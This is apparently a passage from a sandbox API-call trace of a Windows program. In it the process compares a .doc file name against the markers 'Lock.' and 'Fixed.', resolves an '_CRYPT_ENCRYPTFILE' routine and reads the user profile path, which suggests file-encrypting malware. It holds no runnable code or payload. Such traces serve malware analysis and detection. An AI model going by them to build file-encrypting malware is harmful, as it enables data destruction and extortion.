wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.166] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="踚@锴\x97\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0259.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.166] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0259.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0259.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0259.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0259.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.167] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.167] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.167] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.167] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1jNOs4dsiatFwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNOs4dsiatFwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NOs4dsiatFwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Os4dsiatFwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s4dsiatFwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4dsiatFwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dsiatFwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="siatFwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iatFwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="atFwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tFwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FwtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wtPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pt-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0259.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0259.168] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1jNOs4dsiatFwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNOs4dsiatFwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NOs4dsiatFwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Os4dsiatFwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s4dsiatFwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4dsiatFwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dsiatFwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="siatFwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iatFwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="atFwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tFwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FwtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wtPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pt-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j2.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.169] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.169] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0259.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.169] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0259.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0259.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0259.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e58 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0259.170] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0259.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0259.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0259.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0259.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0259.174] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0259.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0259.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0259.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.175] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0259.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0259.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0259.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.176] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0259.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0259.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.177] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.177] 